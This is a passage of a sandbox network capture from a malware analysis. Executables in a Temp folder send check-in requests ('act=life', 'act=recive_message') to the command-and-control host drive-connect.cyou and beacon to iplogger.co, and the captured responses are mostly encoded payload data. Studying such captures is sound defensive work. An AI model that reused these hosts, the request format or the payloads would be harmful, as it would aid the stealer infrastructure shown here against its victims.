                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1369INData Raw: 6d 33 58 6c 34 64 6f 37 54 4d 6f 65 42 69 63 43 4d 4f 6b 56 34 2b 2b 56 74 79 5a 78 4b 47 6b 47 6c 57 48 69 64 65 4e 66 57 39 4c 37 70 46 45 41 62 6c 70 49 65 74 36 69 49 70 61 55 50 58 47 7a 7a 75 47 69 41 70 49 34 75 51 62 46 64 66 41 46 49 2f 2b 37 59 78 38 46 64 51 47 36 32 71 67 4f 61 30 59 69 52 71 41 35 4a 52 50 2f 5a 64 64 57 77 55 69 35 39 73 58 78 63 37 56 6a 58 35 75 43 71 32 53 42 6b 47 36 4c 2b 4a 72 2b 41 75 61 43 31 44 6e 6b 4e 37 72 68 70 58 62 67 47 50 73 32 4a 4a 46 48 56 4f 66 2b 7a 78 49 4c 77 49 52 6b 4c 71 71 49 53 74 36 69 6f 6f 63 51 61 58 55 44 72 38 58 48 6c 6b 47 34 71 63 59 46 67 62 4f 56 45 32 38 71 4d 31 74 55 34 4d 43 4b 33 6a 7a 4b 48 30 59 6e 41 6a 4e 59 6c 4d 4b 75 41 59 54 57 6f 5a 67 70 74 33 47 41 4a 37 53 48 48 79 76
                                                                                                                                                                                                                                                Data Ascii: m3Xl4do7TMoeBicCMOkV4++VtyZxKGkGlWHideNfW9L7pFEAblpIet6iIpaUPXGzzuGiApI4uQbFdfAFI/+7Yx8FdQG62qgOa0YiRqA5JRP/ZddWwUi59sXxc7VjX5uCq2SBkG6L+Jr+AuaC1DnkN7rhpXbgGPs2JJFHVOf+zxILwIRkLqqISt6ioocQaXUDr8XHlkG4qcYFgbOVE28qM1tU4MCK3jzKH0YnAjNYlMKuAYTWoZgpt3GAJ7SHHyv
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1369INData Raw: 57 44 4f 43 6d 67 36 33 2b 49 69 56 6e 44 35 31 54 4d 50 77 61 4e 69 6b 51 6c 4e 77 35 47 43 67 34 58 6a 48 32 70 32 65 76 42 67 64 43 36 71 48 4d 2f 71 77 75 4a 6d 4d 4d 6c 56 63 77 2f 6c 74 30 5a 78 43 4a 6c 57 6c 51 44 7a 52 56 4f 66 53 2f 4b 4c 46 4d 47 77 66 70 71 6f 69 67 34 32 4a 6d 49 77 53 42 47 32 4f 32 64 56 39 63 56 61 32 6d 49 55 64 54 4c 42 45 32 2b 66 46 2f 38 45 51 64 44 75 57 69 69 71 2f 67 4b 43 46 6f 44 35 4a 66 4e 2f 39 66 66 6d 67 53 69 5a 31 6c 56 42 63 7a 55 6a 4c 36 76 69 69 34 43 46 42 43 36 72 58 4d 2f 71 77 48 50 32 67 4e 6e 78 73 6b 75 45 4d 34 62 68 76 4d 78 43 46 55 46 44 4e 58 4e 50 6d 77 49 62 68 4e 46 67 62 73 71 34 71 6c 34 79 59 74 59 67 79 64 56 7a 58 38 57 33 6c 6c 48 49 4f 58 5a 42 68 54 64 56 59 70 74 65 6c 6e 67 55
                                                                                                                                                                                                                                                Data Ascii: WDOCmg63+IiVnD51TMPwaNikQlNw5GCg4XjH2p2evBgdC6qHM/qwuJmMMlVcw/lt0ZxCJlWlQDzRVOfS/KLFMGwfpqoig42JmIwSBG2O2dV9cVa2mIUdTLBE2+fF/8EQdDuWiiq/gKCFoD5JfN/9ffmgSiZ1lVBczUjL6vii4CFBC6rXM/qwHP2gNnxskuEM4bhvMxCFUFDNXNPmwIbhNFgbsq4ql4yYtYgydVzX8W3llHIOXZBhTdVYptelngU
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1369INData Raw: 70 6f 4f 71 72 47 78 6f 5a 42 76 5a 41 33 76 59 55 57 74 2b 46 49 4b 58 64 30 4e 64 4b 68 38 6f 74 62 59 72 38 42 42 65 41 65 61 6d 69 4b 62 67 49 69 78 75 41 34 74 55 50 50 46 54 63 33 73 64 69 35 74 71 55 42 59 36 56 79 50 35 76 7a 57 31 57 67 78 43 6f 2b 32 4c 76 71 78 36 61 46 55 45 69 55 73 34 74 47 74 75 61 67 47 48 6b 57 30 59 41 6e 74 49 63 66 4b 39 5a 2b 67 49 47 41 33 6b 72 6f 4f 6e 35 53 34 6c 5a 67 71 63 57 6a 33 79 55 48 4a 70 45 59 71 64 5a 46 49 65 4e 46 73 34 38 72 6b 67 73 31 70 65 54 4b 32 71 6c 4f 61 30 59 67 46 6b 45 5a 64 4c 65 2b 6b 55 59 53 6b 51 67 4e 77 35 47 42 6b 2f 58 6a 58 79 76 53 47 31 54 68 4d 44 34 71 79 4d 71 65 67 70 49 57 55 43 6c 46 34 32 38 6b 68 79 59 68 69 41 6c 57 31 56 58 58 73 52 4e 75 33 78 66 2f 42 35 45 77 7a
                                                                                                                                                                                                                                                Data Ascii: poOqrGxoZBvZA3vYUWt+FIKXd0NdKh8otbYr8BBeAeamiKbgIixuA4tUPPFTc3sdi5tqUBY6VyP5vzW1WgxCo+2Lvqx6aFUEiUs4tGtuagGHkW0YAntIcfK9Z+gIGA3kroOn5S4lZgqcWj3yUHJpEYqdZFIeNFs48rkgs1peTK2qlOa0YgFkEZdLe+kUYSkQgNw5GBk/XjXyvSG1ThMD4qyMqegpIWUClF428khyYhiAlW1VXXsRNu3xf/B5Ewz
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1369INData Raw: 4f 59 70 4c 57 34 4f 6c 46 67 39 38 46 46 30 65 78 36 4d 6e 32 6f 59 55 33 56 57 4b 62 58 70 5a 35 4e 66 43 41 6a 71 6f 5a 71 74 37 53 45 2b 62 68 50 5a 46 58 76 6e 58 57 6b 70 54 35 71 4d 64 6c 38 43 65 30 68 78 38 72 31 6e 36 41 67 59 43 2b 75 71 69 71 6a 2b 4a 79 35 73 44 4a 42 53 50 2f 35 5a 65 47 30 54 69 35 6c 69 56 42 59 79 55 6a 37 78 75 43 6d 35 52 31 35 4d 72 61 71 55 35 72 52 69 43 58 67 41 6c 56 5a 37 36 52 52 68 4b 52 43 41 33 44 6b 59 45 54 74 55 4d 66 2b 33 49 37 56 4f 46 41 66 74 70 6f 2b 70 36 43 51 73 62 41 4f 53 55 6a 72 77 58 33 4a 69 45 59 47 66 5a 31 35 64 65 78 45 32 37 66 46 2f 38 47 67 46 44 2b 47 71 7a 4c 6d 69 4f 32 68 6b 44 39 6b 44 65 2f 31 57 66 47 34 58 67 5a 39 70 58 52 6b 2f 56 44 48 39 6f 79 2b 77 54 77 77 51 37 61 53 4a
                                                                                                                                                                                                                                                Data Ascii: OYpLW4OlFg98FF0ex6Mn2oYU3VWKbXpZ5NfCAjqoZqt7SE+bhPZFXvnXWkpT5qMdl8Ce0hx8r1n6AgYC+uqiqj+Jy5sDJBSP/5ZeG0Ti5liVBYyUj7xuCm5R15MraqU5rRiCXgAlVZ76RRhKRCA3DkYETtUMf+3I7VOFAftpo+p6CQsbAOSUjrwX3JiEYGfZ15dexE27fF/8GgFD+GqzLmiO2hkD9kDe/1WfG4XgZ9pXRk/VDH9oy+wTwwQ7aSJ
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1369INData Raw: 59 6a 45 5a 70 4c 4f 50 6c 4c 52 69 6c 50 6c 61 49 68 55 77 73 79 51 54 4c 6a 75 69 71 38 57 53 42 43 74 66 6e 65 39 4c 35 77 65 6e 78 44 68 6d 52 31 74 6c 73 34 4d 53 36 56 33 48 63 59 52 57 63 66 63 65 66 78 66 2f 41 50 48 52 44 2f 71 34 2b 77 37 32 55 57 58 53 53 50 55 54 7a 6d 58 57 39 6d 56 38 4c 63 62 68 68 46 44 42 45 34 38 71 6f 32 70 6b 55 4f 42 61 32 53 77 75 62 30 59 6e 41 6a 4e 70 70 56 4e 66 46 4d 61 53 51 77 6d 70 5a 6d 53 42 6f 69 58 6e 47 37 38 53 48 77 45 45 31 4d 72 61 6d 64 35 72 52 79 65 6a 68 57 79 67 78 72 70 45 55 32 63 46 65 61 33 44 6b 4b 55 33 56 44 63 61 33 78 59 4c 4e 61 44 41 54 75 75 34 2f 68 30 68 77 50 65 51 36 66 54 43 72 49 5a 48 39 7a 47 6f 71 4c 63 42 51 49 4e 6c 38 2f 38 71 64 6e 2f 67 67 52 51 72 57 55 7a 4f 36 73 48
                                                                                                                                                                                                                                                Data Ascii: YjEZpLOPlLRilPlaIhUwsyQTLjuiq8WSBCtfne9L5wenxDhmR1tls4MS6V3HcYRWcfcefxf/APHRD/q4+w72UWXSSPUTzmXW9mV8LcbhhFDBE48qo2pkUOBa2Swub0YnAjNppVNfFMaSQwmpZmSBoiXnG78SHwEE1Mramd5rRyejhWygxrpEU2cFea3DkKU3VDca3xYLNaDATuu4/h0hwPeQ6fTCrIZH9zGoqLcBQINl8/8qdn/ggRQrWUzO6sH
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1369INData Raw: 4c 41 47 36 6c 44 53 67 37 43 4d 4b 46 49 55 35 64 62 51 4e 2f 74 61 4e 6e 36 41 68 5a 41 66 2b 2f 69 71 58 36 49 57 39 64 50 62 35 56 50 50 64 4d 61 48 34 59 73 71 4a 30 57 78 4d 37 56 69 66 6b 38 57 6e 77 52 31 35 61 31 4f 33 45 35 74 4e 73 61 48 74 44 77 52 73 4f 39 56 52 32 62 67 47 64 30 55 5a 57 47 6a 52 48 49 65 4b 2b 5a 2f 34 49 47 45 4b 31 2f 38 4c 6d 36 44 4e 6f 4f 31 50 4c 41 47 36 6c 44 53 67 37 43 4d 4b 46 49 55 35 64 62 51 4e 2f 74 61 4e 6e 36 41 68 5a 41 66 2b 2f 69 71 58 36 49 57 39 64 50 62 35 56 50 50 64 4d 61 48 34 59 77 37 4a 58 65 53 4d 4c 52 44 4c 37 76 79 43 6d 57 56 35 4d 72 61 4c 4d 2f 74 56 69 59 43 4d 38 31 78 73 6a 74 67 49 34 58 42 53 43 6b 6d 5a 4f 44 48 68 32 50 2f 4b 77 4d 61 42 66 45 55 33 44 6d 36 33 6d 6f 6d 49 75 49 31
                                                                                                                                                                                                                                                Data Ascii: LAG6lDSg7CMKFIU5dbQN/taNn6AhZAf+/iqX6IW9dPb5VPPdMaH4YsqJ0WxM7Vifk8WnwR15a1O3E5tNsaHtDwRsO9VR2bgGd0UZWGjRHIeK+Z/4IGEK1/8Lm6DNoO1PLAG6lDSg7CMKFIU5dbQN/taNn6AhZAf+/iqX6IW9dPb5VPPdMaH4Yw7JXeSMLRDL7vyCmWV5MraLM/tViYCM81xsjtgI4XBSCkmZODHh2P/KwMaBfEU3Dm63momIuI1
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1369INData Raw: 79 48 64 71 62 67 65 50 33 6c 42 4f 48 6a 56 66 4e 72 58 2f 5a 36 67 49 52 6b 4c 41 76 34 75 32 37 32 4a 6d 49 77 2f 5a 41 33 76 37 53 48 39 35 46 4d 43 62 65 31 39 64 4b 68 38 6f 74 61 64 6e 36 42 74 51 51 76 2f 74 31 4f 61 72 4c 43 56 69 41 4a 64 59 4b 65 52 63 65 33 38 55 79 36 4a 66 64 51 38 79 51 54 4b 33 67 43 71 30 58 67 73 42 2f 61 71 79 6d 4d 45 77 4c 33 4d 41 32 33 63 38 2b 31 5a 47 56 79 43 64 6d 33 45 61 4f 7a 5a 48 4d 72 58 2f 5a 36 67 49 52 6b 4c 41 76 34 75 32 37 32 41 45 5a 41 36 56 47 79 53 34 51 7a 68 2f 56 39 54 50 4c 78 67 50 64 51 6c 78 73 72 49 31 6f 6b 34 64 46 4f 37 71 73 70 6a 42 4d 43 39 7a 41 4e 74 71 4e 76 4a 4d 62 57 6f 48 69 36 4a 66 64 51 38 79 51 54 4b 33 6c 42 33 79 65 51 67 42 37 61 4f 4c 35 71 4a 69 4d 43 4e 62 32 58 59
                                                                                                                                                                                                                                                Data Ascii: yHdqbgeP3lBOHjVfNrX/Z6gIRkLAv4u272JmIw/ZA3v7SH95FMCbe19dKh8otadn6BtQQv/t1OarLCViAJdYKeRce38Uy6JfdQ8yQTK3gCq0XgsB/aqymMEwL3MA23c8+1ZGVyCdm3EaOzZHMrX/Z6gIRkLAv4u272AEZA6VGyS4Qzh/V9TPLxgPdQlxsrI1ok4dFO7qspjBMC9zANtqNvJMbWoHi6JfdQ8yQTK3lB3yeQgB7aOL5qJiMCNb2XY


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                36192.168.2.449986172.67.139.784435900C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:32 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Host: drive-connect.cyou
                                                                                                                                                                                                                                                2024-12-13 12:53:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1014INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=j46go3rk5ahn0ghmmfongl3c0l; expires=Tue, 08-Apr-2025 06:40:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l4qY6UvL2WZ%2BNk1zQYITjMqL1mULeIwIz33GYKUNUWAcvpYD3wGrD7Kd1qj8QM%2BrgTWSuQMYm9pkmDsc0KBFR43cnfWy2le8MoV1txmaNsZANzMyuM9178g5S8VzTwusGZEl3uA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f1618fda9b043bf-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1758&rtt_var=669&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1624026&cwnd=252&unsent_bytes=0&cid=1a4afbee7877d9bb&ts=2073&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                37192.168.2.450249104.21.82.934434264C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:35 UTC142OUTGET /1t8nM4.torrent HTTP/1.1
                                                                                                                                                                                                                                                Referer: BEGIN
                                                                                                                                                                                                                                                User-Agent: BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86
                                                                                                                                                                                                                                                Host: iplogger.co
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:35 UTC1355INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:35 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                memory: 0.6107177734375
                                                                                                                                                                                                                                                expires: Fri, 13 Dec 2024 12:53:35 +0000
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                                Set-Cookie: 56521988137264061=3; expires=Sat, 13 Dec 2025 12:53:35 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                Set-Cookie: clhf03028ja=8.46.123.189; expires=Sat, 13 Dec 2025 12:53:35 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5kHqRcil7IsYkvvecGf%2Bh9XcJd%2FDsGgUo6kaACbMZn5K77faskg1lRaxCIKjSj0CLGfGsvGEIp3VHyh2kltYO1%2Fo%2FrMlJ42xBYx8pd09LfmWJ6fbCMk4r%2FB9JFb3dg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f16190eed3443ee-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2088&min_rtt=2082&rtt_var=793&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=780&delivery_rate=1368963&cwnd=230&unsent_bytes=0&cid=9010e2d910f32ef3&ts=1166&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:53:35 UTC14INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00
                                                                                                                                                                                                                                                Data Ascii: 74PNG
                                                                                                                                                                                                                                                2024-12-13 12:53:35 UTC108INData Raw: 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                Data Ascii: IHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                                2024-12-13 12:53:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                38192.168.2.450256172.67.139.784435900C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:36 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 46
                                                                                                                                                                                                                                                Host: drive-connect.cyou
                                                                                                                                                                                                                                                2024-12-13 12:53:36 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=8a9uuhv9bfrksuvrgrc6ivtstv; expires=Tue, 08-Apr-2025 06:40:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K7HiLseRbiTgGBEPFawlrstfCavri%2Ftfz1T26V89L84Tiz0p8VUFofDhFO%2BP0NvtS94Clxhzf%2BWlEOD2DPE%2Fw5e8vtHwSRNuFMsXMA4ToRk9VAjyPJQCbrS9ONriO7Agv0I2TM4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161917eb900c78-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1691&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=948&delivery_rate=1698662&cwnd=230&unsent_bytes=0&cid=9b006db327ae7341&ts=752&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC352INData Raw: 31 64 32 63 0d 0a 6c 65 6b 31 6f 58 52 6e 55 6f 79 2b 47 59 6f 35 47 59 38 77 6f 69 5a 50 70 55 6e 47 53 37 68 38 55 49 67 69 68 53 72 41 49 4b 50 75 79 30 4f 44 54 6c 4e 2b 72 73 31 38 71 41 4e 74 2f 55 58 48 43 6d 33 45 4c 65 52 78 33 68 30 38 2b 30 65 70 43 4c 5a 4e 67 61 2b 50 56 4d 30 48 41 6e 36 75 32 32 47 6f 41 30 4c 30 45 73 64 49 62 5a 39 72 6f 79 48 61 48 54 7a 71 51 2b 35 46 73 45 7a 41 2f 59 56 53 79 52 45 45 4e 75 33 53 64 4f 39 63 66 4f 35 61 7a 45 38 69 7a 53 54 6b 5a 35 6f 5a 4b 71 6f 59 70 32 65 6c 56 4d 4c 59 69 45 62 4b 56 68 70 2b 39 35 78 38 35 42 73 6a 72 56 48 48 52 43 50 44 4c 61 30 6a 30 42 51 30 36 30 62 76 57 71 6c 47 79 2f 32 4c 55 63 67 62 44 53 4c 67 32 48 50 6b 57 6e 62 75 45 6f 34 45 4b 74 39 72 2f 47 6d 4a 4c 44 48 37 55
                                                                                                                                                                                                                                                Data Ascii: 1d2clek1oXRnUoy+GYo5GY8woiZPpUnGS7h8UIgihSrAIKPuy0ODTlN+rs18qANt/UXHCm3ELeRx3h08+0epCLZNga+PVM0HAn6u22GoA0L0EsdIbZ9royHaHTzqQ+5FsEzA/YVSyREENu3SdO9cfO5azE8izSTkZ5oZKqoYp2elVMLYiEbKVhp+95x85BsjrVHHRCPDLa0j0BQ060bvWqlGy/2LUcgbDSLg2HPkWnbuEo4EKt9r/GmJLDH7U
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC1369INData Raw: 30 58 43 44 44 38 31 48 44 6a 58 6d 6e 6d 57 38 31 4a 4c 63 6f 68 71 79 72 61 47 54 6a 67 54 2b 31 4d 72 30 2f 48 39 34 73 58 6a 56 59 43 4b 4b 36 45 4f 38 74 65 61 2b 70 65 31 67 59 58 68 7a 54 71 4d 4a 6f 5a 50 71 6f 59 70 30 43 6e 51 63 4c 38 68 46 54 4c 48 52 63 77 2f 4e 70 32 37 55 6c 39 36 46 7a 4b 52 7a 2f 4e 4a 61 49 71 30 78 55 37 37 30 66 6a 43 4f 77 43 78 75 2f 4c 44 34 4d 33 43 44 76 69 31 6d 7a 6f 47 32 53 6a 53 34 42 44 49 59 64 7a 35 43 33 62 47 6a 50 75 54 75 6c 4d 72 6b 54 50 2b 6f 52 52 79 52 59 43 4f 75 62 55 65 75 56 51 64 4f 31 58 7a 55 41 72 79 79 71 68 61 5a 52 65 4e 66 49 41 76 77 69 4d 52 63 4c 6c 79 57 4c 41 47 41 73 33 2b 4a 78 6b 70 6b 49 37 36 6c 36 41 48 47 33 4a 4c 71 73 37 32 77 77 33 35 46 4c 72 54 61 52 50 77 76 6d 4c 55
                                                                                                                                                                                                                                                Data Ascii: 0XCDD81HDjXmnmW81JLcohqyraGTjgT+1Mr0/H94sXjVYCKK6EO8tea+pe1gYXhzTqMJoZPqoYp0CnQcL8hFTLHRcw/Np27Ul96FzKRz/NJaIq0xU770fjCOwCxu/LD4M3CDvi1mzoG2SjS4BDIYdz5C3bGjPuTulMrkTP+oRRyRYCOubUeuVQdO1XzUAryyqhaZReNfIAvwiMRcLlyWLAGAs3+JxkpkI76l6AHG3JLqs72ww35FLrTaRPwvmLU
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC1369INData Raw: 33 2b 4a 78 6b 70 6b 49 37 36 6c 36 41 48 47 33 4b 49 36 45 73 31 52 38 34 35 45 58 74 52 4b 70 4d 77 75 57 45 55 38 4d 61 44 54 72 6a 30 6e 2f 67 55 6e 44 6d 56 4d 42 46 4a 34 64 6c 35 43 37 43 58 6d 71 71 64 4f 42 45 72 30 32 44 77 6f 68 5a 7a 52 45 54 63 50 47 53 59 71 68 63 64 36 30 4b 67 45 67 6b 78 79 43 75 4c 64 6f 5a 50 2b 39 44 34 45 75 76 52 63 76 35 6a 46 50 50 48 77 67 32 37 74 74 2f 37 55 6c 2b 35 46 37 4d 42 47 4f 48 4c 4c 78 70 67 6c 34 64 37 56 62 6b 5a 36 46 54 79 4c 65 55 47 64 70 57 41 6a 79 75 68 44 76 76 58 6e 50 6d 56 4d 68 45 50 38 49 6c 72 79 6a 51 47 44 50 6e 54 4f 46 49 6f 30 4c 48 2b 34 74 51 78 41 51 58 4e 65 6a 4f 63 61 67 56 4f 2b 70 4b 67 42 78 74 38 54 75 7a 4f 4d 78 63 42 2b 6c 4f 36 55 2b 30 41 74 36 35 6b 68 66 45 47 6b
                                                                                                                                                                                                                                                Data Ascii: 3+JxkpkI76l6AHG3KI6Es1R845EXtRKpMwuWEU8MaDTrj0n/gUnDmVMBFJ4dl5C7CXmqqdOBEr02DwohZzRETcPGSYqhcd60KgEgkxyCuLdoZP+9D4EuvRcv5jFPPHwg27tt/7Ul+5F7MBGOHLLxpgl4d7VbkZ6FTyLeUGdpWAjyuhDvvXnPmVMhEP8IlryjQGDPnTOFIo0LH+4tQxAQXNejOcagVO+pKgBxt8TuzOMxcB+lO6U+0At65khfEGk
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC1369INData Raw: 64 65 56 51 64 4f 5a 41 77 45 6b 70 79 79 2b 73 49 74 42 65 66 4b 70 48 2f 77 6a 36 41 76 54 36 68 46 66 41 41 45 55 76 6f 4d 55 37 37 31 63 37 74 52 4c 4d 53 69 33 49 4a 36 67 69 30 68 38 2b 35 45 66 69 51 61 70 4b 30 2f 61 50 58 38 49 59 43 6a 48 71 32 58 37 73 58 48 2f 72 58 59 41 4b 62 63 41 7a 35 48 47 61 4d 52 58 66 41 73 5a 79 34 6c 32 50 37 73 74 51 7a 31 5a 64 63 4f 4c 66 64 2b 42 55 66 65 52 65 79 6b 30 6d 79 79 43 67 4a 64 4d 62 4e 4f 74 46 34 6b 6d 6d 54 73 76 78 69 46 54 4d 47 51 6f 34 72 70 49 37 37 30 4d 37 74 52 4c 6c 55 79 62 4a 4c 65 51 32 6c 41 64 79 37 55 79 6e 45 4f 4a 4f 79 50 47 4e 55 73 38 58 41 7a 6a 72 31 48 2f 70 58 58 33 75 58 63 52 42 4c 4d 67 76 71 43 66 51 48 7a 50 6d 53 2b 68 44 70 77 4b 50 74 34 78 50 67 30 35 46 41 65 33
                                                                                                                                                                                                                                                Data Ascii: deVQdOZAwEkpyy+sItBefKpH/wj6AvT6hFfAAEUvoMU771c7tRLMSi3IJ6gi0h8+5EfiQapK0/aPX8IYCjHq2X7sXH/rXYAKbcAz5HGaMRXfAsZy4l2P7stQz1ZdcOLfd+BUfeReyk0myyCgJdMbNOtF4kmmTsvxiFTMGQo4rpI770M7tRLlUybJLeQ2lAdy7UynEOJOyPGNUs8XAzjr1H/pXX3uXcRBLMgvqCfQHzPmS+hDpwKPt4xPg05FAe3
